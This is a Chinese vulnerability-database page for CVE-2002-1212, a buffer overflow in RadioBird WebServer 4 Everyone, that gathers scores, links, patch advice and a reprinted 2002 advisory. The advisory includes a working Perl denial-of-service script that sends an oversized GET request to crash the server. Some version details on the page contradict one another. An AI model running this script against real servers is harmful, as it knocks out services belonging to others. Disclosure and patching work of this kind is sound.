CVE-2002-1212
CVSS5.0
发布时间 :2002-10-28 00:00:00
修订时间 :2008-09-10 15:14:03
NMCOPS    

[原文]Buffer overflow in RadioBird Software WebServer 4 Everyone 1.23 and 1.27, and other versions before 1.30, allows remote attackers to cause a denial of service (crash) via a long HTTP GET request.


[CNNVD]WebServer 4 Everyone超长GET请求远程拒绝服务攻击漏洞(CNNVD-200210-288)

        
        WebServer 4 Everyone服务程序是由RadioBird Software开发和维护的功能强大、安装维护方便的WEB服务程序,设计用于Microsoft Windows操作系统。
        WebServer 4 Everyone服务程序不正确处理超长的GET请求,远程攻击者可以利用这个漏洞进行拒绝服务攻击。
        由于WEB服务程序对GET请求边界检查不正确,攻击者可以提交超过3000个字符的GET请求给WebServer 4 Everyone,就会导致WebServer 4 Everyone崩溃。需要手工启动获得正常功能。
        

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: NONE [对系统的机密性无影响]
完整性影响: NONE [不会对系统完整性产生影响]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:radiobird_software:webserver_4_all:1.23
cpe:/a:radiobird_software:webserver_4_all:1.27

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1212
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-1212
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200210-288
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/5967
(UNKNOWN)  BID  5967
http://www.iss.net/security_center/static/10372.php
(VENDOR_ADVISORY)  XF  webserver-4everyone-filename-bo(10372)
http://www.idefense.com/application/poi/display?id=49&type=vulnerabilities&flashstatus=true
(UNKNOWN)  IDEFENSE  20021014 DoS and Directory Traversal Vulnerabilities in WebServer 4 Everyone

- 漏洞信息

WebServer 4 Everyone超长GET请求远程拒绝服务攻击漏洞
中危 未知
2002-10-28 00:00:00 2005-10-20 00:00:00
远程  
        
        WebServer 4 Everyone服务程序是由RadioBird Software开发和维护的功能强大、安装维护方便的WEB服务程序,设计用于Microsoft Windows操作系统。
        WebServer 4 Everyone服务程序不正确处理超长的GET请求,远程攻击者可以利用这个漏洞进行拒绝服务攻击。
        由于WEB服务程序对GET请求边界检查不正确,攻击者可以提交超过3000个字符的GET请求给WebServer 4 Everyone,就会导致WebServer 4 Everyone崩溃。需要手工启动获得正常功能。
        

- 公告与补丁

        临时解决方法:
        如果您不能立刻安装补丁或者升级,CNNVD建议您采取以下措施以降低威胁:
        * 暂时使用防火墙限制WebServer 4 Everyone的WEB服务,只允许可信用户访问。
        厂商补丁:
        www.freeware.lt
        ---------------
        下载使用WebServer 4 Everyone 1.30版本:
        ftp://ftp.freeware.lt/anonymous/Soft/w4asetup.exe

- 漏洞信息 (F29868)

webserver4everyone.txt (PacketStormID:F29868)
2002-10-25 00:00:00
Tamer Sahin,David Endler  idefense.com
denial of service,vulnerability
CVE-2002-1212,CVE-2002-1213
[点击下载]

iDEFENSE Security Advisory 10.15.02 - RadioBird Software's WebServer 4 Everyone v1.27 and below contains denial of service and directory traversal vulnerabilities allowing any file on the system to be downloaded. Fix available here.

-----BEGIN PGP SIGNED MESSAGE-----
Hash: MD5

- --[ Web Server 4 Everyone v1.28 Host Field Denial of Service Vulnerability ]--

- --[ Type

Denial of Service

- --[ Release Date

October 23, 2002

- --[ Product / Vendor

Web Server 4 Everyone is an Internet and Intranet server that supports HTTP Services.
Web Server 4 Everyone is available for Microsoft Windows operating systems.

http://www.freeware.lt/Info/projects.php

- --[ Summary

The problem is Web Server 4 Everyone v1.28 with bounds checking, when you request 2000
characters "web4all.exe"  just shuts down. This vulnerability also affects Web Server 4
Everyone versions prior to v1.28 for Microsoft Windows 2000.

When the attacker send a request in size of 2000 characters in "Host:" field that contains
all "127.0.0.1", the server  crashes. In case you send a request that size without adding
the "Host:" there is no effect on running program. The Web server must be restarted to
regain normal functionality.

- --[ Exploit

An exploit for this vulnerability exists and is available below.

=============== SNIP ===============

#!/usr/bin/perl -w

use IO::Socket;

$host = $ARGV[0];
$port = $ARGV[1];
$evil = "A" x 2000;

print "Web Server 4 Everyone v1.28 Host Field Denial of Service Vulnerability by SecurityOffice\n";
print "Usage: $0 host port\n";
print "Connecting...\n";
$socket = IO::Socket::INET->
            new(Proto=>"tcp",
            PeerAddr=>$host,
            PeerPort=>$port)
            || die "Connection failed.\n";

print "Attacking...\n";
print $socket "GET /$evil HTTP/1.1\n Host: 127.0.0.1\n\n";

close($socket);
print "\nConnection closed. Finished.\n\n";

=============== SNIP ===============

- --[ Tested

Windows 2000 Sp3 / Web Server 4 Everyone v1.28
Windows 98 SE / Web Server 4 Everyone v1.28

- --[ Vulnerable

Web Server 4 Everyone v1.28

- --[ Vendor Status

This vulnerability fixed Web Server 4 Everyone v1.32

- --[ Disclaimer

http://www.securityoffice.net is not responsible for the misuse or illegal use of
any of the information and/or the software listed on this security advisory.

- --[ Author

Tamer Sahin
ts@securityoffice.net
http://www.securityoffice.net

All our advisories can be viewed at http://www.securityoffice.net/articles/

Please send suggestions, updates, and comments to feedback@securityoffice.net

(c) 2002 SecurityOffice

This Security Advisory may be reproduced and distributed, provided that this Security
Advisory is not modified in any way and is attributed to SecurityOffice and provided
that such reproduction and distribution is performed for non-commercial purposes.

Tamer Sahin
http://www.securityoffice.net

-----BEGIN PGP SIGNATURE-----
Version: 2.6

iQEVAwUAPbZoQfpL5ibJRTtBAQFQlgf/RK+3BewSrQX6XjB8FjWatCWlEOydKC9I
TB+ULUWKgTOi31J0DFSYTkFQmTLZBt8Z08QHIA3R4KSCRdv9d7UuzkTIcETnwaxO
sDih29SyjysOteW0ikNtRxjQHnZydBqa8v2YRj5iQBnJbirKsPwCL0OPKx17VWZc
9wGiL07gVYVgM7xgARdhkUwXmYLTZk19WCx0ZXBxIyDdl8wTwF9VR6dy33i5vc7C
AIh5CRCS4Z0aYOHt91GF7yrsOZsjppxXMHdiBX5B/F1vJQNMJpxeEd7565NlDdV+
qBUlNkchIYeQt8jLjAlsMC6FQ/9OGrs7Y56UreB9Qj0Ky0xo8sQu+w==
=0MpF
-----END PGP SIGNATURE-----



    

- 漏洞信息

14511
WebServer 4 Everyone HTTP GET Request Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity Upgrade
Exploit Private Vendor Verified, Coordinated Disclosure

- 漏洞描述

- 时间线

2002-10-15 Unknow
Unknow 2002-10-15

- 解决方案

Upgrade to version 1.30 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

RadioBird Software WebServer 4 All Buffer Overflow Vulnerability
Unknown 5967
Yes No
2002-10-15 12:00:00 2009-07-11 06:06:00
Discovery of this vulnerability credited to Tamer Sahin (ts@securityoffice.net).

- 受影响的程序版本

RadioBird Software WebServer 4 All 1.27
RadioBird Software WebServer 4 All 1.23
RadioBird Software WebServer 4 All 1.30

- 不受影响的程序版本

RadioBird Software WebServer 4 All 1.30

- 漏洞讨论

A buffer overflow vulnerability has been reported for WebServer 4 All.

An attacker can exploit this vulnerability by issuing excessively long 'GET' requests to a system running a vulnerable version of WebServer 4 All. This will cause the Web server to crash.

- 漏洞利用

Currently we are not aware of any exploits for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com <mailto:vuldb@securityfocus.com>.

- 解决方案

The vendor has stated that WebServer 4 All 1.30 is not vulnerable to this issue. Users are advised to upgrade to the newest version of WebServer 4 All:


RadioBird Software WebServer 4 All 1.23

RadioBird Software WebServer 4 All 1.27

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站